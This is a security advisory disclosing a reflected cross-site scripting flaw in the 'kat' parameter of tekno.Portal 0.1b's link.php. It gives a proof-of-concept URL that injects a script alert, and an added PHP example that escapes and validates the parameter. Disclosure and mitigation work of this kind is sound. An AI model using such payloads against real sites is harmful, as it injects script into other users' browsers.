=====================================================================
tekno.Portal v0.1b - Cross-Site Scripting Vulnerability in "link.php"
=====================================================================


____________________________________________________________________________________


# Exploit Title: tekno.Portal v0.1b - Cross-Site Scripting Vulnerability in "link.php" 

# Date: [09-25-2018]

# Category: Webapps
____________________________________________________________________________________


# Author: Socket_0x03 (Alvaro J. Gene)

# Email: Socket_0x03 (at) teraexe (dot) com

# Website: www.teraexe.com 

____________________________________________________________________________________


# Software Link: http://sourceforge.net/projects/teknoportal

# Vulnerable Application: tekno.Portal

# Version: 0.1b

# File: link.php

# Parameter: kat

# Language: This application is available only in Turkish.

# Product Description: Tekno.Portal is a content management system (CMS) written
in PHP that a webmaster can use to manage files, store data, and more.

____________________________________________________________________________________


# Cross-Site Scripting Vulnerability:

http://www.website.com/teknoportal/link.php?kat=<"Test">[XSS]

# XSS Example: 

http://www.website.com/teknoportal/link.php?kat=<"Test"><script>alert(23)</script>
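
A server-side mitigation for the reflected "kat" value, as an added example that is not part of the original advisory or of tekno.Portal's code. It assumes link.php writes "kat" back into its HTML response and that "kat" is a numeric category id; html_escape(), kat_as_id() and render_kat() are hypothetical helper names.

```php
<?php
// Added example, not tekno.Portal source. Assumption: link.php writes the
// "kat" query parameter back into its HTML response. html_escape(),
// kat_as_id() and render_kat() are hypothetical helper names.

/** Encode a value for HTML text and quoted-attribute contexts. */
function html_escape(string $value): string
{
    // ENT_QUOTES encodes " and ' as well as < > &, so the value cannot close
    // an attribute or open a tag. ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return kat as a positive integer id, or null if it is not one. */
function kat_as_id($raw): ?int
{
    if (!is_string($raw)) {          // rejects ?kat[]=... arrays
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Build the fragment that echoes kat; every dynamic part is encoded. */
function render_kat($raw): string
{
    $id = kat_as_id($raw);
    if ($id === null) {
        // Assumption: kat is a numeric category id, so anything else is
        // reported without echoing the raw value at all.
        return '<p class="error">Invalid category.</p>';
    }
    return '<a href="link.php?kat=' . html_escape((string) $id) . '">Category '
         . html_escape((string) $id) . '</a>';
}

// Constructed inputs: a valid id, the advisory's test string, and an array.
$samples = ['7', '<"Test"><script>alert(23)</script>', ['x']];
foreach ($samples as $raw) {
    echo render_kat($raw), "\n";
}
// If kat must be free text, encode it at output instead of validating as int:
echo html_escape('<"Test"><script>alert(23)</script>'), "\n";
```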

____________________________________________________________________________________




# References:

https://seclists.org/bugtraq/2018/Sep/71
https://cxsecurity.com/issue/WLB-2018090252
https://packetstormsecurity.com/files/149566/tekno.Portal-0.1b-Cross-Site-Scripting.html